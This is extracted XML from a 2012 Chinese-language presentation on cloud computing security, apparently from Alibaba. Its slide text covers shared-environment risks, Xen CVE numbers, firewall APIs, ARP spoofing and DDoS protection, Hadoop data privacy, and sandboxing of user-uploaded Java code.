      <dgm:prSet presAssocID="{74DA8192-1ADF-46B6-8668-655F15A99F46}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1C513F50-415E-4296-8B55-01185D3D9E15}" type="pres">
      <dgm:prSet presAssocID="{AC85673F-0B2D-4B91-877E-0B45B553F7A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9D7CF5-89AE-4A48-ADCB-BD45B38D89B3}" type="pres">
      <dgm:prSet presAssocID="{F0087B11-D590-4260-86EC-B8B3E46565E9}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2C72231F-CA86-4740-B03C-5210E3FA47B6}" type="pres">
      <dgm:prSet presAssocID="{B8677769-D5F6-4C9A-90CA-241E908EDBB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23CF84C-71AE-4F32-A792-A0AB2CE9F265}" srcId="{552963EC-4307-48D5-84D1-7B51728F239B}" destId="{AF59FAA4-4248-435B-9C0D-BB58114ADEC3}" srcOrd="0" destOrd="0" parTransId="{1CBBA16A-A3AC-441C-BB06-A511E16B56D6}" sibTransId="{74DA8192-1ADF-46B6-8668-655F15A99F46}"/>
    <dgm:cxn modelId="{13C6F8A3-D607-4683-806C-2CB6E409A7BE}" type="presOf" srcId="{B8677769-D5F6-4C9A-90CA-241E908EDBB0}" destId="{2C72231F-CA86-4740-B03C-5210E3FA47B6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{F98D300C-D51A-432E-B89C-851CDCE0776B}" srcId="{552963EC-4307-48D5-84D1-7B51728F239B}" destId="{B8677769-D5F6-4C9A-90CA-241E908EDBB0}" srcOrd="2" destOrd="0" parTransId="{9494BABA-CC7E-46A1-91C1-7AED8F35517A}" sibTransId="{C6E305A8-4A5C-43B1-848E-856E35D229C7}"/>
    <dgm:cxn modelId="{E12545DF-2542-433B-B956-1A7F6F41DCFE}" srcId="{552963EC-4307-48D5-84D1-7B51728F239B}" destId="{AC85673F-0B2D-4B91-877E-0B45B553F7A6}" srcOrd="1" destOrd="0" parTransId="{04995BCE-E6E5-40D9-8077-3E130C7B1465}" sibTransId="{F0087B11-D590-4260-86EC-B8B3E46565E9}"/>
    <dgm:cxn modelId="{02859033-9A4D-4238-A9B6-8316DEEF821D}" type="presOf" srcId="{AF59FAA4-4248-435B-9C0D-BB58114ADEC3}" destId="{75C8E1DF-0F35-4056-9A8E-5F4351571366}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{A20AD5E4-54AD-441E-A365-74F6955BCFDE}" type="presOf" srcId="{AC85673F-0B2D-4B91-877E-0B45B553F7A6}" destId="{1C513F50-415E-4296-8B55-01185D3D9E15}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{8BD1BCC3-B4A1-4170-B4E8-9480CD9AA339}" type="presOf" srcId="{552963EC-4307-48D5-84D1-7B51728F239B}" destId="{BA7CC302-B183-4C69-A544-52CBF65AEB63}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{90D61432-23D2-4E5A-9CC3-C9771B4CB732}" type="presParOf" srcId="{BA7CC302-B183-4C69-A544-52CBF65AEB63}" destId="{75C8E1DF-0F35-4056-9A8E-5F4351571366}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{FF91374B-00C2-40CD-A264-9B331A1EC0BB}" type="presParOf" srcId="{BA7CC302-B183-4C69-A544-52CBF65AEB63}" destId="{B6E11F9C-90D4-4B36-9F24-BB25161AC7C2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{6C055C49-33E3-4B3F-9DE3-A62321FBD3AB}" type="presParOf" srcId="{BA7CC302-B183-4C69-A544-52CBF65AEB63}" destId="{1C513F50-415E-4296-8B55-01185D3D9E15}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{8F2D1596-383D-4936-A253-B1D6F6031D9E}" type="presParOf" srcId="{BA7CC302-B183-4C69-A544-52CBF65AEB63}" destId="{899D7CF5-89AE-4A48-ADCB-BD45B38D89B3}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{E2782055-DBBA-4A52-9E94-15B5B75481BB}" type="presParOf" srcId="{BA7CC302-B183-4C69-A544-52CBF65AEB63}" destId="{2C72231F-CA86-4740-B03C-5210E3FA47B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C179582-7D5C-4DC0-A177-C391B673EDF1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="35066"/>
          <a:ext cx="5904656" cy="13803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400" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>按需使用，按需付费</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="4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35066"/>
        <a:ext cx="5904656" cy="1380307"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E7C36212-A3FE-4973-BE3E-CC4E29AE0B08}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1542094"/>
          <a:ext cx="5904656" cy="13803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400" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>专业运维服务化</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="4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1542094"/>
        <a:ext cx="5904656" cy="1380307"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{AF237041-402B-4E27-AECE-D764C5331708}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3049121"/>
          <a:ext cx="5904656" cy="13803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400" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>快速部署，自助开通</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" sz="4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3049121"/>
        <a:ext cx="5904656" cy="138030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28A160A-DA2E-453A-8B79-ECC493B50092}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2879"/>
          <a:ext cx="5328591" cy="1443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600" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>巨大的共享环境</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="4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2879"/>
        <a:ext cx="5328591" cy="1443048"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FC7C6660-F579-4724-9ADC-1C6F75A0020B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1578408"/>
          <a:ext cx="5328591" cy="1443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600" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>网络安全问题</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" sz="4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1578408"/>
        <a:ext cx="5328591" cy="144304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68E0513-D5D9-4ED1-8F04-2F75C9EFC413}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="10800000">
          <a:off x="1618889" y="161495"/>
          <a:ext cx="6337569" cy="40869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6108" tIns="121920" rIns="227584" bIns="121920" numCol="1" spcCol="1270" anchor="t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1" kern="1200" dirty="0" smtClean="0"/>
            <a:t>CVE-2012-2625</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2500" kern="1200" dirty="0" smtClean="0"/>
            <a:t>   XEN 4.x</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN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1" kern="1200" dirty="0" smtClean="0"/>
            <a:t>CVE-2010-4255</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2500" kern="1200" dirty="0" smtClean="0"/>
            <a:t>   XEN 4.0.1</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN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1" kern="1200" dirty="0" smtClean="0"/>
            <a:t>CVE-2010-4247  </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2500" kern="1200" dirty="0" smtClean="0"/>
            <a:t> XEN 3.4.0 </a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN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1" kern="1200" dirty="0" smtClean="0"/>
            <a:t>CVE-2010-3699</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2500" kern="1200" dirty="0" smtClean="0"/>
            <a:t>   XEN 3.x</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" sz="2500" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="10800000">
        <a:off x="1618889" y="161495"/>
        <a:ext cx="6337569" cy="4086981"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0E2C60EE-B2DF-48E7-B6EC-3C0545E71FA8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="127491" y="879182"/>
          <a:ext cx="2755371" cy="285286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FA91CC0-B4A6-47F8-9B1E-EA3DA2F6389B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="10646"/>
          <a:ext cx="6336703" cy="11920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800" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>防火墙</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="3800" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>API</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" sz="3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10646"/>
        <a:ext cx="6336703" cy="1192083"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{682CB181-60ED-4717-89B7-53B1FD6B36F7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1312170"/>
          <a:ext cx="6336703" cy="11920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800" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>防止</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="3800" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>ARP </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" sz="3800" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>欺骗、</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="3800" kern="1200" dirty="0" err="1" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>srcip</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" sz="3800" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>伪造</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="3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1312170"/>
        <a:ext cx="6336703" cy="1192083"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B1F09175-F9EA-4D95-97A0-C2B4D99C53F3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2613693"/>
          <a:ext cx="6336703" cy="11920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800" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>自动化清洗</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="3800" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>DDOS</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" sz="3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2613693"/>
        <a:ext cx="6336703" cy="119208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28A160A-DA2E-453A-8B79-ECC493B50092}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2879"/>
          <a:ext cx="5328591" cy="1443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>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>保护用户数据</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="4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2879"/>
        <a:ext cx="5328591" cy="1443048"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FC7C6660-F579-4724-9ADC-1C6F75A0020B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1578408"/>
          <a:ext cx="5328591" cy="1443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>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>隐私数据</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" sz="4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1578408"/>
        <a:ext cx="5328591" cy="1443048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925029C-BB8D-468E-97FC-55DDC2A34389}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="-195434" y="196112"/>
          <a:ext cx="1302894" cy="9120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 rot="5400000">
        <a:off x="-195434" y="196112"/>
        <a:ext cx="1302894" cy="912026"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B792CA2B-597B-4082-A55D-99EF477226A3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="2300824" y="-1388120"/>
          <a:ext cx="846881" cy="36244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600" kern="1200" dirty="0" err="1" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>Hadoop</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2600" kern="12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sz="2600" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>为</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2600" kern="1200" dirty="0" err="1" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>linux</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2600" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>设计</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2600" kern="1200" dirty="0">
            <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="5400000">
        <a:off x="2300824" y="-1388120"/>
        <a:ext cx="846881" cy="3624477"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{10B5771C-8BDE-4106-B6B2-DBA93218D7D0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="-195434" y="1196117"/>
          <a:ext cx="1302894" cy="9120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 rot="5400000">
        <a:off x="-195434" y="1196117"/>
        <a:ext cx="1302894" cy="912026"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D965B576-E055-4DD2-8233-CD3B44B4DA0C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="2300824" y="-388114"/>
          <a:ext cx="846881" cy="36244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>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>共享“</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2600" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>gateway</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2600" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>”</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2600" kern="1200" dirty="0">
            <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="5400000">
        <a:off x="2300824" y="-388114"/>
        <a:ext cx="846881" cy="3624477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9207B7F-68B6-415C-BF77-CFB1A824C29D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1004" y="206083"/>
          <a:ext cx="3656707" cy="1828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800" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>原始数据的导入计算结果的导出</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="3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004" y="206083"/>
        <a:ext cx="3656707" cy="1828353"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{34AA0462-4269-48FE-9802-824A38B8ED92}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4571888" y="206083"/>
          <a:ext cx="3656707" cy="1828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800" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>运行环境安全</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="3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571888" y="206083"/>
        <a:ext cx="3656707" cy="1828353"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BF2D9718-E6BC-48FD-AF93-8E430F830867}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4937559" y="2034437"/>
          <a:ext cx="365670" cy="1371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1265"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="365670" y="13712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189824-7C45-4B12-BBBF-E4E47EB73E22}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5303229" y="2491525"/>
          <a:ext cx="2925365" cy="1828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000" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>并不仅仅是认证与授权</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" sz="4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5303229" y="2491525"/>
        <a:ext cx="2925365" cy="1828353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925029C-BB8D-468E-97FC-55DDC2A34389}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="-195434" y="196112"/>
          <a:ext cx="1302894" cy="9120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 rot="5400000">
        <a:off x="-195434" y="196112"/>
        <a:ext cx="1302894" cy="912026"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B792CA2B-597B-4082-A55D-99EF477226A3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="2840884" y="-1928180"/>
          <a:ext cx="846881" cy="47045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>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>用户上传的</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="3200" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>java code</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" kern="1200" dirty="0">
            <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="5400000">
        <a:off x="2840884" y="-1928180"/>
        <a:ext cx="846881" cy="4704597"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{10B5771C-8BDE-4106-B6B2-DBA93218D7D0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="-195434" y="1196117"/>
          <a:ext cx="1302894" cy="9120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 rot="5400000">
        <a:off x="-195434" y="1196117"/>
        <a:ext cx="1302894" cy="912026"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D965B576-E055-4DD2-8233-CD3B44B4DA0C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="2840884" y="-928174"/>
          <a:ext cx="846881" cy="47045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>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>缺乏</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="3200" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>sandbox</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" kern="1200" dirty="0">
            <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="5400000">
        <a:off x="2840884" y="-928174"/>
        <a:ext cx="846881" cy="4704597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C8E1DF-0F35-4056-9A8E-5F4351571366}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="620366"/>
          <a:ext cx="7200800" cy="10352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300" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>云计算改变互联网</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="3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620366"/>
        <a:ext cx="7200800" cy="1035230"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1C513F50-415E-4296-8B55-01185D3D9E15}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1750636"/>
          <a:ext cx="7200800" cy="10352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300" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>弹性计算的环境安全、网络安全</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="3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1750636"/>
        <a:ext cx="7200800" cy="1035230"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2C72231F-CA86-4740-B03C-5210E3FA47B6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2880907"/>
          <a:ext cx="7200800" cy="10352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300" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>海量数据计算的数据安全、隐私问题</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" sz="3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2880907"/>
        <a:ext cx="7200800" cy="1035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FAD7A-E8DD-48B2-A353-2934C04F5C4B}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2012/7/20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0B927-BAF2-4C05-8F7A-D3D40F8486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eblog.ikvm.net/PermaLink.aspx?guid=cd48169a-9405-4f63-9087-798c4a1866d3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blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://schierlm.users.sourceforge.net/TypeConfusion.html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随时随地能使用的服务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0B927-BAF2-4C05-8F7A-D3D40F84868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阿里系的传统：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>B2B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taobao</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>都是服务于中小微企业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D5920-620B-4FDD-860C-8691FC803AC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D5920-620B-4FDD-860C-8691FC803AC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D5920-620B-4FDD-860C-8691FC803AC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D5920-620B-4FDD-860C-8691FC803AC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Amazon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
